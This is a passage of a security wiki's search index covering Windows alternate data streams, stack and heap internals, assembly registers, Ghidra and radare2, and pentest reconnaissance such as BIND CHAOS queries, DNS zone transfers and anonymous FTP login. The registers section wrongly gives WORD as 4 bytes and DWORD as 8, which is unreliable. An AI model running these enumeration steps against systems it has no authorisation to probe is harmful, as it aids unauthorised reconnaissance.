For example, echo hello > file.txt\necho secret > file.txt:hidden Windows Explorer is completely oblivious to the alternate data stream. The command-line, however, is not: Additionally, the dir /R command can be used to list alternate data streams for files in a directory: A more sophisticated tool for managing ADSs, called Streams, comes with the Sysinternals suite. It can be used with the -s option to recursively show all streams for the files in a directory: The number next to the stream name is the size of the data stored in the stream. Streams can also be used to delete all streams from a file with the -d option:","breadcrumbs":"System Internals » Windows » File System » Working with ADSs","id":"270","title":"Working with ADSs"},"271":{"body":"","breadcrumbs":"Reverse Engineering » Reverse Engineering","id":"271","title":"Reverse Engineering"},"272":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » Program Anatomy","id":"272","title":"Program Anatomy"},"273":{"body":"The stack is a place in memory. It's a Last-In-First-Out (LIFO) data structure, meaning that the last element to be added will be the first to get removed. Each thread has its own stack, which is usually no bigger than a few megabytes. Adding data to the stack is called pushing onto the stack, whilst removing data is called popping off the stack. Although the location of the added or removed data is fixed (it's always to or from the top of the stack), existing data can still be read or written to arbitrarily. A special register is used for keeping track of the top of the stack - the stack pointer or rsp. When pushing data, the stack pointer decreases, and when removing data, the stack pointer increases. This is because the stack grows from higher to lower memory addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » The Stack","id":"273","title":"The Stack"},"274":{"body":"When a function is invoked, a stack frame is constructed. 
First, the function's arguments which do not fit into the registers are pushed on the stack, then the call instruction pushes the return address. Following this, the function prologue saves the value of a special register known as the base pointer (rbp) onto the stack and rbp is then updated to point to the location on the stack where the old base pointer was saved. From then on, the stack pointer is used for allocating local data inside the function and the base pointer is used for accessing this data. Because the saved base pointer and the return address sit directly above the local variables, a buffer overflow in a local array overwrites them first. long func(long a, long b, long c, long d, long e, long f, long g, long h)\n{ long x = a * b * c * d * e * f * g * h; long y = a + b + c + d + e + f + g + h; long z = otherFunc(x, y); return z + 20;\n} Sometimes, the base pointer might be completely absent in optimised programs because compilers are good enough at keeping track of offsets directly from the stack pointer.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Stack » Stack Frames","id":"274","title":"Stack Frames"},"275":{"body":"Each program is comprised of a set of instructions which tell the CPU what operations it needs to perform. Different CPU architectures make use of different instruction sets, however, all of them boil down to two things - an operation code (opcode) and optional data that the instruction operates with. 
These are all represented using bits - 1s and 0s.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » Instructions","id":"275","title":"Instructions"},"276":{"body":"Copies the value of its second operand into its first operand (here rdx into rax): mov rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » mov","id":"276","title":"mov"},"277":{"body":"Load effective address - this instruction calculates the address denoted by its second operand and moves it into its first operand: lea rdx, [rax+0x10] This will put the value rax+0x10 into rdx without reading memory at that address.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » lea","id":"277","title":"lea"},"278":{"body":"This instruction adds its operands and stores the result in its first operand: add rax, rdx","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » add","id":"278","title":"add"},"279":{"body":"This instruction subtracts the second operand from the first and stores the result in its first operand: sub rax, 0x9","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » sub","id":"279","title":"sub"},"28":{"body":"The BIND software is the most commonly used name server software, which supports CHAOSNET queries. This can be used to query the name server for its software type and version. We are no longer querying the domain name system but are instead requesting information about the BIND instance. Our queries will still take the form of domain names - using .bind as the top-level domain. The results from such a query are returned as TXT records. 
Use the following syntax for querying BIND with the CHAOS class: dig @ ┌──(cr0mll@kali)-[~]-[]\n└─$ dig @192.168.129.138 chaos version.bind txt ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 chaos version.bind txt\n; (1 server found)\n;; global options: +cmd\n;; Got answer:\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38138\n;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1\n;; WARNING: recursion requested but not available ;; OPT PSEUDOSECTION:\n; EDNS: version: 0, flags:; udp: 4096\n;; QUESTION SECTION:\n;version.bind. CH TXT ;; ANSWER SECTION:\nversion.bind. 0 CH TXT \"9.8.1\" ;; AUTHORITY SECTION:\nversion.bind. 0 CH NS version.bind. ;; Query time: 0 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Tue Sep 14 16:24:35 EEST 2021\n;; MSG SIZE rcvd: 73 Looking at the answer section, we see that this name server is running BIND 9.8.1. Administrators can override this string with the version option in named.conf, so treat it as a hint rather than proof. Other chaos records you can request are hostname.bind, authors.bind, and server-id.bind.","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » Enumerating BIND servers with CHAOS","id":"28","title":"Enumerating BIND servers with CHAOS"},"280":{"body":"It performs XOR-ing on its operands and stores the result in the first operand: xor rdx, rax The and and or instructions work the same way, but instead perform a binary AND and a binary OR operation, respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » xor","id":"280","title":"xor"},"281":{"body":"Decreases the stack pointer (grows the stack) by 8 (4 on x86) bytes and stores the contents of its operand on the stack: push rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » push","id":"281","title":"push"},"282":{"body":"Loads the value at the top of the stack into its operand and then increases the stack pointer (shrinks the stack) by 8 (4 on x86) bytes: pop rax","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » pop","id":"282","title":"pop"},"283":{"body":"Jumps to the 
address specified - used for redirecting code execution: jmp 0x6A2B10","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jmp","id":"283","title":"jmp"},"284":{"body":"Used for invoking procedures. It pushes the address of the instruction following the call (the return address) onto the stack and then jumps to the specified address. Saving the caller's base pointer is not done by call itself but by the prologue of the called function. After the function is finished, a ret instruction is issued which pops the return address off the stack and continues execution from there. Because the return address lives on the stack, anything that overwrites it (a stack buffer overflow, for instance) redirects execution as soon as ret runs.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » call","id":"284","title":"call"},"285":{"body":"It compares the value of its two operands (by subtracting the second from the first and discarding the result) and sets the flags accordingly: cmp rax, rdx Treating the operands as unsigned: If rax < rdx, the zero flag is set to 0 and the carry flag is set to 1. If rax > rdx, the zero flag is set to 0 and the carry flag is set to 0. If rax = rdx, the zero flag is set to 1 and the carry flag is set to 0. Signed comparisons are decided from the sign and overflow flags instead.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » cmp","id":"285","title":"cmp"},"286":{"body":"jump-if-zero and jump-if-not-zero execute depending on the state of the zero flag: jz jumps when the zero flag is set, jnz when it is clear.","breadcrumbs":"Reverse Engineering » Program Anatomy » Instructions » jz / jnz","id":"286","title":"jz / jnz"},"287":{"body":"The heap is a memory region which allows for dynamic allocation. Memory on the heap is allotted at runtime and programs are permitted to freely request additional heap memory whenever it is required. It is the program's job to release every piece of heap memory it requested exactly once. Failure to do so can result in undefined behaviour. In C, heap memory is usually allocated through the use of malloc and whenever the program is finished with this data, the free function must be invoked in order to hand the area back to the allocator so that it can be reused (and possibly returned to the operating system). 
Heap memory can also be allocated by using malloc-compatible heap functions like calloc, realloc and memalign or in C++ using the corresponding new and new[] operators as well as their deallocation counterparts delete and delete[].","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The Heap","id":"287","title":"The Heap"},"288":{"body":"Do not read or write to a pointer returned by malloc after that pointer has been passed to free. -> Can lead to use after free vulnerabilities. Do not use or leak uninitialised information in a heap allocation. -> Can lead to information leaks or uninitialised data vulnerabilities. Do not read or write bytes after the end of an allocation. -> Can lead to heap overflow and read beyond bounds vulnerabilities. Do not pass a pointer that originated from malloc to free more than once. -> Can lead to double free vulnerabilities. Do not write bytes before the beginning of the allocation. -> Can lead to heap underflow vulnerabilities. Do not pass a pointer that did not originate from malloc to free. -> Can lead to invalid free vulnerabilities. Do not use a pointer returned by malloc before checking if the function returned NULL. -> Can lead to null-dereference bugs and sometimes arbitrary write vulnerabilities. The implementation of the heap is platform specific.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Heap Rules","id":"288","title":"Heap Rules"},"289":{"body":"The heap grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » The GLIBC Heap","id":"289","title":"The GLIBC Heap"},"29":{"body":"A zone transfer request provides the means for copying a DNS zone file from one name server to another. This, however, only works over TCP. If the server accepts zone transfer requests from arbitrary clients, you can obtain all the records of a DNS server for a particular zone. 
This is done through the AXFR request type: dig @ AXFR ┌──(cr0mll0@kali)-[~]-[]\n└─$ dig @192.168.129.138 AXFR nsa.gov ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 AXFR nsa.gov\n; (1 server found)\n;; global options: +cmd\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\nnsa.gov. 3600 IN NS ns1.nsa.gov.\nnsa.gov. 3600 IN NS ns2.nsa.gov.\nnsa.gov. 3600 IN MX 10 mail1.nsa.gov.\nnsa.gov. 3600 IN MX 20 mail2.nsa.gov.\nfedora.nsa.gov. 3600 IN TXT \"The black sparrow password\"\nfedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337\nfedora.nsa.gov. 3600 IN A 10.1.0.80\nfirewall.nsa.gov. 3600 IN A 10.1.0.105\nfw.nsa.gov. 3600 IN A 10.1.0.102\nmail1.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.25 ~all\"\nmail1.nsa.gov. 3600 IN A 10.1.0.25\nmail2.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.26 ~all\"\nmail2.nsa.gov. 3600 IN A 10.1.0.26\nns1.nsa.gov. 3600 IN A 10.1.0.50\nns2.nsa.gov. 3600 IN A 10.1.0.51\nprism.nsa.gov. 3600 IN A 172.16.40.1\nprism6.nsa.gov. 3600 IN AAAA ::1\nsigint.nsa.gov. 3600 IN A 10.1.0.101\nsnowden.nsa.gov. 3600 IN A 172.16.40.1\nvpn.nsa.gov. 3600 IN A 10.1.0.103\nweb.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nwebmail.nsa.gov. 3600 IN A 10.1.0.104\nwww.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nxkeyscore.nsa.gov. 3600 IN TXT \"knock twice to enter\"\nxkeyscore.nsa.gov. 3600 IN A 10.1.0.100\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\n;; Query time: 4 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Fri Sep 17 22:38:47 EEST 2021\n;; XFR size: 27 records (messages 1, bytes 709)","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » DNS Zone Transfer","id":"29","title":"DNS Zone Transfer"},"290":{"body":"The heap manager allocates resources in the so-called chunks . These chunks are stored adjacent to each other and must be 8-byte aligned or 16-byte aligned on 32-bit and 64-bit systems respectively. 
In addition to this padding, each chunk contains metadata which provides information about the chunk itself. Consequently, issuing a request for memory allocation on the heap actually allocates more bytes than originally requested. It is important to distinguish between in-use chunks and free (or previously allocated) chunks, since they have disparate memory layouts. The following diagram outlines a chunk that is in use: The size field contains the chunk size in bytes. Because chunk sizes are always multiples of the alignment, the lowest three bits of the size field are always zero and are reused as flags: A (0x04, NON_MAIN_ARENA) - If this bit is 0, the chunk belongs to the main arena and the main heap. If this bit is 1, the chunk belongs to a non-main arena whose heap is an mmap'd region, and the location of that heap can be computed from the chunk's address. M (0x02, IS_MMAPPED) - If this bit is set, then the chunk was allocated directly with mmap and isn't part of any heap. Typically used for large allocations. P (0x01, PREV_INUSE) - If this bit is set, then the previous chunk is in use and must not be considered for coalescing. If it is clear, the previous chunk is free and the prev_size field holds its size, which is how free locates the neighbour to merge with. A free chunk looks a bit different: The size and AMP fields carry the same meaning as those in chunks that are in use. Free chunks are organised in singly or doubly linked lists called bins . The fwd and bck pointers (fd and bk in the glibc source) are utilised in the implementation of those linked lists. Different types of bins exist for different purposes. The top of the heap is by convention called the top chunk .
If such a chunk is found, it is removed from the bin, turned into an in-use chunk and then a pointer is returned to the user data section of the chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from Free Chunks","id":"292","title":"Allocating from Free Chunks"},"293":{"body":"If no free chunk is found that can service the request, the heap manager must construct an entirely new chunk at the top of the heap. To achieve this, it first needs to ascertain whether there is enough space at the top of the heap to hold the new chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from the Top Chunk","id":"293","title":"Allocating from the Top Chunk"},"294":{"body":"Once the free space at the top of the heap is used up, the heap manager will have to ask the kernel for additional memory. On the initial heap, the heap manager asks the kernel to allocate more memory at the end of the heap by calling sbrk. On most Linux-based systems this function internally uses a system call called brk. Eventually, the heap will grow to its maximum size, since expanding it any further would cause it to intrude on other sections of the process' address space. In this case, the heap manager will resort to using mmap to map new memory for heap expansions. If mmap also fails, then the process is unable to allocate more memory and malloc returns NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Requesting Additional Memory at the Top of the Heap from the Kernel","id":"294","title":"Requesting Additional Memory at the Top of the Heap from the Kernel"},"295":{"body":"Large chunks get treated differently in their allocation. These are allocated off-heap through the direct use of mmap calls and this is reflected in the chunk's metadata by setting the M bit to 1. 
When such allocations are later returned to the heap manager via a call to free, the heap manager releases the entire mmap-ed region back to the system via munmap. Different platforms have different default thresholds for what counts as a large chunk and what doesn't; glibc starts with 128 KiB and adjusts the threshold dynamically as mmap-ed chunks are freed.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating Large Chunks","id":"295","title":"Allocating Large Chunks"},"296":{"body":"Multithreaded applications require that internal data structures on the heap are protected from race conditions. In the past, the heap manager availed itself of a global mutex before every heap operation, however, significant performance issues arose as a result. Consequently, the concept of \"arenas\" was introduced. Each arena consists of a separate heap which manages its own chunk allocation and bins. Although each arena still utilises a mutex for its internal operations, different threads can make use of different arenas to avoid having to wait for each other. The initial (main) arena consists of a single heap and for single-threaded applications it is all there will ever be. However, as more threads are spawned, new arenas are allocated and attached to them. Once all available arenas are being utilised by threads, the heap manager will commence creating new ones until a limit - 2 * Number of CPU cores for 32-bit and 8 * Number of CPU cores for 64-bit processes - is reached. Afterwards, multiple threads will be forced to share the same arena.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Arenas","id":"296","title":"Arenas"},"297":{"body":"Free chunks are organised in the so-called bins which are essentially linked lists. For performance reasons different types of bins exist. There are 62 small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. The last two appeared later and are built on top of the first three. 
Pointers to the small, large, and unsorted bins are stored in the same array in the heap manager: BIN[0] -> invalid (unused)\nBIN[1] -> unsorted bin\nBIN[2] to BIN[63] -> small bins\nBIN[64] to BIN[126] -> large bins","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Bins","id":"297","title":"Bins"},"298":{"body":"There are 62 small bins and each of them stores chunks of a fixed size. Each chunk with a size less than 512 bytes on 32-bit systems and 1024 bytes on 64-bit systems has a corresponding small bin. Small bins are trivially sorted, since all of their elements have the same size, and insertion and removal of entries on these bins is incredibly fast.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Small Bins","id":"298","title":"Small Bins"},"299":{"body":"There are 63 large bins and they resemble small bins in their operation but each of them stores chunks from a range of sizes, kept sorted by size. Consequently, insertion and removal of entries on these lists is slower, since the bin has to be traversed in order to find a suitable chunk. There is a different number of bins allocated for specific chunk size ranges. The size of the chunk size range begins at 64 bytes - there are 32 bins all of which shift the range of chunk sizes they store by 64 from the previous bin. Following are 16 bins which shift the range by 512 bytes and so on. In essence: Bin 1 -> stores chunks of sizes 512 - 568 bytes; Bin 2 -> stores chunks of sizes 576 - 632 bytes; ... 
There are: Number of Bins Spacing between Bins 32 64 16 512 8 4096 4 32768 2 262144 1 Remaining chunk sizes","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Large Bins","id":"299","title":"Large Bins"},"3":{"body":"Any major changes outside of the eight category folders in the Notes/ directory are not permitted and will be rejected.","breadcrumbs":"Cyberclopaedia » Contributing » Out-of-Scope","id":"3","title":"Out-of-Scope"},"30":{"body":"The File Transfer Protocol (FTP) is a common protocol which you may find during a penetration test. It is a TCP-based protocol and runs on port 21. Luckily, its enumeration is simple and rather straight-forward. You can use the ftp command if you have credentials: ftp You can then proceed with typical navigation commands like dir, cd, pwd, get and send to navigate and interact with the remote file system. If you don't have credentials you can try with the usernames guest, anonymous, or ftp and an empty password in order to test for anonymous login.","breadcrumbs":"Reconnaissance » Enumeration » FTP Enumeration (21) » Introduction","id":"30","title":"Introduction"},"300":{"body":"There is a single unsorted bin. Chunks from small and large bins end up directly in this bin after they are freed. The point of the unsorted bin is to speed up allocations by serving a sort of cache. When malloc is invoked, it will first traverse this bin and see if it can immediately service the request. If not, it will move onto the small or large bins respectively.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Unsorted Bins","id":"300","title":"Unsorted Bins"},"301":{"body":"Fast bins provide a further optimisation layer. Recently released small chunks are put in fast bins and are not initially merged with their neighbours. This allows for them to be repurposed forthwith, should a malloc request for that chunk size come very soon after the chunk's release. 
There are 10 fast bins, covering chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80, and 88 bytes plus chunk metadata. Fast bins are implemented as singly linked lists and insertions and removals of entries in them are really fast. Periodically, the heap manager consolidates the heap - chunks in the fast bins are merged with the abutting chunks and inserted into the unsorted bin. This consolidation occurs when a malloc request is issued for a size that is larger than a fast bin can serve (chunks over 512 bytes on 32-bit systems and over 1024 bytes on 64-bit systems), when freeing a chunk larger than 64KB or when malloc_trim or mallopt is invoked.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Fast Bins","id":"301","title":"Fast Bins"},"302":{"body":"A new caching mechanism called tcache (thread local caching) was introduced in glibc version 2.26 back in 2017. The tcache stores bins of fixed size small chunks as singly linked lists. Similarly to a fast bin, chunks in tcache bins aren't merged with adjoining chunks. By default, there are 64 tcache bins, each containing a maximum of 7 same-sized chunks. The possible chunk sizes range from 12 to 516 bytes on 32-bit systems and from 24 to 1032 bytes on 64-bit systems. When a chunk is freed, the heap manager checks if the chunk fits into a tcache bin corresponding to that chunk size. If the tcache bin for this size is full or the chunk is simply too big to fit into a tcache bin, the heap manager obtains a lock on the arena and proceeds to comb through other bins in order to find a suitable one for the chunk. When malloc needs to service a request, it first checks the tcache for a chunk of the requested size that is available and should such a chunk be found, malloc will return it without ever having to obtain a lock. If the requested size is too big for the tcache, malloc continues as before. A slightly different strategy is employed if the requested chunk size does have a corresponding tcache bin, but that bin is simply empty while other bins hold chunks of that size. 
In that case, malloc obtains a lock and promotes as many heap chunks of the requested size to tcache chunks, up to the tcache bin limit of 7. Subsequently, the last matching chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » TCache Bins","id":"302","title":"TCache Bins"},"303":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » malloc and free","id":"303","title":"malloc and free"},"304":{"body":"First, every allocation exists as a memory chunk which is aligned and contains metadata as well as the region the programmer wants. When a programmer requests memory from the heap, the heap manager first works out what chunk size the allocation request corresponds to, and then searches for the memory in the following order: If the size corresponds with a tcache bin and there is a tcache chunk available, return that immediately. If the request is huge, allocate a chunk off-heap via mmap. Otherwise obtain the arena heap lock and then perform the following steps, in order: Try the fastbin/smallbin recycling strategy If a corresponding fast bin exists, try and find a chunk from there (and also opportunistically prefill the tcache with entries from the fast bin). Otherwise, if a corresponding small bin exists, allocate from there (opportunistically prefilling the tcache as we go). Resolve all the deferred frees - Otherwise merge the entries in the fast bins and move their consolidated chunks to the unsorted bin. - Go through each entry in the unsorted bin. If it is suitable, return it. Otherwise, put the unsorted entry on its corresponding small/large bin as we go (possibly promoting small entries to the tcache). Default back to the basic recycling strategy If the chunk size corresponds with a large bin, search the corresponding large bin now. Create a new chunk from scratch Otherwise, there are no chunks available, so try and get a chunk from the top of the heap. 
If the top of the heap is not big enough, extend it using sbrk. If the top of the heap can’t be extended because we ran into something else in the address space, create a discontinuous extension using mmap and allocate from there If all else fails, return NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocation","id":"304","title":"Allocation"},"305":{"body":"If the pointer is NULL, do nothing. Otherwise, convert the pointer back to a chunk by subtracting the size of the chunk metadata. Perform a few sanity checks on the chunk, and abort if the sanity checks fail. If the chunk fits into a tcache bin, store it there. If the chunk has the M bit set, give it back to the operating system via munmap. Otherwise we obtain the arena heap lock and then: If the chunk fits into a fastbin, put it on the corresponding fastbin. If the chunk size is greater than 64KB, consolidate the fastbins immediately and put the resulting merged chunks on the unsorted bin. Merge the chunk backwards and forwards with neighboring freed chunks in the small, large, and unsorted bins. If the resulting chunk lies at the top of the heap, merge it into the top chunk. Otherwise store it in the unsorted bin.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Deallocation","id":"305","title":"Deallocation"},"306":{"body":"Registers are value containers which reside on the CPU and not in RAM. They are small in size and some have special purposes. You may store both addresses and values in registers and depending on the instruction used the data inside will be interpreted in a different way - this is commonly called an addressing mode . 
In x86 Intel assembly (i386), the registers are 32 bits (4 bytes) in size and some of them are reserved: ebp - the base pointer, points to the bottom of the current stack frame esp - the stack pointer, points to the top of the current stack frame eip - the instruction pointer, points to the next instruction to be executed The other registers are general purpose registers and can be used for anything you like: eax, ebx, ecx, edx, esi, edi. x64 AMD assembly (amd64) extends these 32-bit registers to 64-bit ones and denotes these new versions by replacing the initial e with an r: rbp, rsp, rip, rax, ... It is important to note that these are not different registers - eax and rax refer to the same space on the CPU, however, eax only provides access to the lower 32 bits of the 64-bit register. You can also get access to the lower 16 and 8 bits of the register using different names: 8 Byte Register Lower 4 Bytes Lower 2 Bytes Lower Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, you cannot access the lower 16 or 8 bits of the instruction pointer. 
You might sometimes see WORD or DWORD being used in a similar context - WORD means 4 bytes and DWORD means 8 bytes.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Registers","id":"306","title":"Registers"},"307":{"body":"Under x64 Linux, function arguments are passed via registers: rdi: First Argument\nrsi: Second Argument\nrdx: Third Argument\nrcx: Fourth Argument\nr8: Fifth Argument\nr9: Sixth Argument The return value is stored in rax (eax on 32-bit machines).","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Use in x64 Linux","id":"307","title":"Register Use in x64 Linux"},"308":{"body":"Register dereferencing occurs when the value of the register is treated as an address to the actual data to be used, rather than the data itself. This means that addresses can be stored in registers and used later - this is useful when dealing with large data sizes. For example, mov rax, [rdx] will check the value inside rdx and treat it as an address - it will go to the location where this address points and get its data from there. It will then move this data into rax. If we hadn't used [], it would have treated the address in rdx simply as a value and moved it directly into rax.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Dereferencing","id":"308","title":"Register Dereferencing"},"309":{"body":"Ghidra is an open-source framework for reverse engineering developed by the NSA. 
It groups binaries into projects which can be shared amongst multiple people.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Introduction","id":"309","title":"Introduction"},"31":{"body":"You will need working knowledge of SNMP in order to follow through.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Introduction","id":"31","title":"Introduction"},"310":{"body":"To install Ghidra, you can run sudo apt install ghidra.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Installation","id":"310","title":"Installation"},"311":{"body":"File -> New Project Non-Shared Project Select Directory Name the Project","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Creating a Project","id":"311","title":"Creating a Project"},"312":{"body":"File -> Import File Select the binary you want to import Ghidra will automatically detect certain information about the file After importing, Ghidra will display an Import Results Summary containing information about the binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Loading a Binary","id":"312","title":"Loading a Binary"},"313":{"body":"Double-clicking on a program will open it in the Code Browser. A prompt will appear for analysing the binary. Ghidra will attempt to create and label functions, as well as identify any cross-references in memory. Once the binary has been analysed you will be presented with the following screen:","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Initial Analysis » Initial Analysis","id":"313","title":"Initial Analysis"},"314":{"body":"radare2 is an open-source framework for reverse engineering. The framework includes multiple tools which all work in tandem in order to aid in the analysis of binary files. 
It uses short abbreviations for its commands - single letters - and many of its commands have subcommands which are also expressed as single letters. Luckily, you can always append a ? to a specific command in order to view its subcommands and what they do. To quit radare2, use the q command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Introduction","id":"314","title":"Introduction"},"315":{"body":"You can load a binary by invoking the r2 command. You might sometimes need to also add the -e io.cache=true option in order to fix relocations in disassembly.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Loading a Binary","id":"315","title":"Loading a Binary"},"316":{"body":"aaa - analyse the binary afl - list the analysed functions axt - list all the places where a function is called. Note, you need to use the flag name that radare automatically creates for functions after aaa.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Analysis » Analysis","id":"316","title":"Analysis"},"317":{"body":"/ - search the bytes of the binary for a specific string /w - search for wide character strings like Unicode symbols","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Strings » Strings","id":"317","title":"Strings"},"318":{"body":"i - display file information ie - find the program's entry point iM - find the program's main function iz - pull the hard-coded strings from the executable (only the data sections), use izz to get the strings from the entire binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Binary Info » Binary Info","id":"318","title":"Binary Info"},"319":{"body":"Flags resemble bookmarks. They associate a name with a given offset in a file. 
Create a new flag f @ offset You can also remove a flag by appending - to the command: f- List available flags - f: Rename a flag fr ","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flags","id":"319","title":"Flags"},"32":{"body":"snmp-check is a simple utility for basic SNMP enumeration. You only need to provide it with the IP address to enumerate: snmp-check [IP] Furthermore, you have the following command-line options: -p: Change the port to enumerate. Default is 161. -c: Change the community string to use. Default is public -v: Change the SNMP version to use. Default is v1. There are additional arguments that can be provided but these are the salient ones.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmp-check","id":"32","title":"SNMP Enumeration using snmp-check"},"320":{"body":"Flag names should be unique for addressing reasons. However, it is often the case that you need to have simple and ubiquitous names like loop or return. For this purpose exist the so-called \"local\" flags, which are tied to the function where they reside. It is possible to add them using f. command:","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Local Flags","id":"320","title":"Local Flags"},"321":{"body":"Flags can be grouped into flag spaces - is a namespace for flags, grouping together similar flags. Some flag spaces include sections, registers, symbols. These are managed with the fs command. [0x00001080]> fs?\nUsage: fs [*] [+-][flagspace|addr] # Manage flagspaces\n| fs display flagspaces\n| fs* display flagspaces as r2 commands\n| fsj display flagspaces in JSON\n| fs * select all flagspaces\n| fs flagspace select flagspace or create if it doesn't exist\n| fs-flagspace remove flagspace\n| fs-* remove all flagspaces\n| fs+foo push previous flagspace and set\n| fs- pop to the previous flagspace\n| fs-. 
remove the current flagspace\n| fsq list flagspaces in quiet mode\n| fsm [addr] move flags at given address to the current flagspace\n| fss display flagspaces stack\n| fss* display flagspaces stack in r2 commands\n| fssj display flagspaces stack in JSON\n| fsr newname rename selected flagspace","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flag Spaces","id":"321","title":"Flag Spaces"},"322":{"body":"Moving around the file requires the usage of the seek (s) command in order to change the offset at which we are. It takes one argument which is a mathematical expression capable of containing flag names, parentheses, addition, subtraction, multiplication of immediates or contents of memory using brackets. Examples: [0x00000000]> s 0x10\n[0x00000010]> s+4\n[0x00000014]> s-\n[0x00000010]> s+\n[0x00000014]> Here is a list of additional seeking commands: [0x00000000]> s?\nUsage: s # Help for the seek commands. See ?$? to see all variables\n| s Print current address\n| s.hexoff Seek honoring a base from core->offset\n| s:pad Print current address with N padded zeros (defaults to 8)\n| s addr Seek to address\n| s- Undo seek\n| s-* Reset undo seek history\n| s- n Seek n bytes backward\n| s--[n] Seek blocksize bytes backward (/=n)\n| s+ Redo seek\n| s+ n Seek n bytes forward\n| s++[n] Seek blocksize bytes forward (/=n)\n| s[j*=!] List undo seek history (JSON, =list, *r2, !=names, s==)\n| s/ DATA Search for next occurrence of 'DATA'\n| s/x 9091 Search for next occurrence of \\x90\\x91\n| sa [[+-]a] [asz] Seek asz (or bsize) aligned to addr\n| sb Seek aligned to bb start\n| sC[?] string Seek to comment matching given string\n| sf Seek to next function (f->addr+f->size)\n| sf function Seek to address of specified function\n| sf. Seek to the beginning of current function\n| sg/sG Seek begin (sg) or end (sG) of section or file\n| sl[?] 
